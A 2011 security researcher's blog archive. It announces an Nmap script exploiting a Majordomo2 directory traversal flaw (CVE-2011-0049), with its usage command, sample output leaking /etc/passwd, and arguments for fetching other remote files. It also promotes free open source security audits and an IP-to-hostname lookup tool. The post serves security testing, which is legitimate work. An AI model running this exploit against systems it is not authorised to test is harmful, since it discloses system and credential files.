June 2011 – calderonpale.com

Exploiting Majordomo2 with Nmap

June 28, 2011June 28, 2011 calderpwn Leave a comment

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

http-majordomo2-dir-traversal.rfile – Remote file to download. Default: /etc/passwd
http-majordomo2-dir-traversal.uri – URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
http-majordomo2-dir-traversal.outfile – If set it saves the remote file to this location.

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

]]>

FREE web security audits to open source projects

June 21, 2011June 21, 2011 calderpwn Leave a comment

What is Websec’s “Open Source Web Security Campaign” ?

A campaign designed to help secure open source web applications that may not have the resources to conduct a complete security audit.

How does it work ?

You suggest or submit your project and if we accept it, we will conduct a complete security audit and report the vulnerabilities privately at no cost.

Can anyone apply?

Because the information we need to disclose is sensitive, we will only accept proposals from project directors or well known supporters.

Where can I get more details?

Visit http://websec.ca/opensource-web-security-campaign

]]>

Auditorias de seguridad gratis para proyectos de software libre

June 21, 2011June 21, 2011 calderpwn Leave a comment

Qué es la “Campaña de seguridad de software libre” de Websec ?

Una campaña para ayudar a asegurar a proyectos de software libre que no cuenten con los recursos para evaluar la seguridad de su producto correctamente.

Como funciona esto ?

Tu nos sugieres tu proyecto software libre y si es aceptado, nos comunicaremos en privado contigo para reportar todas las vulnerabilidades encontradas y te ayudaremos a repararlas.

Cualquiera puede aplicar?

Debido a que la información que necesitamos revelar es muy sensible solo aceptaremos proyectos de personas que sea comprobado un rol importante en el proyecto.

Donde puedo obtener más información

Para conocer las bases visita http://www.websec.mx/seguridad-gratuita-para-software-libre

]]>

WhatAreMyHosts.com – IP to hostnames

June 4, 2011June 4, 2011 calderpwn Leave a comment

I created a small web application that uses Bing’s results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don’t abuse it 😉

http://whataremyhosts.com

]]>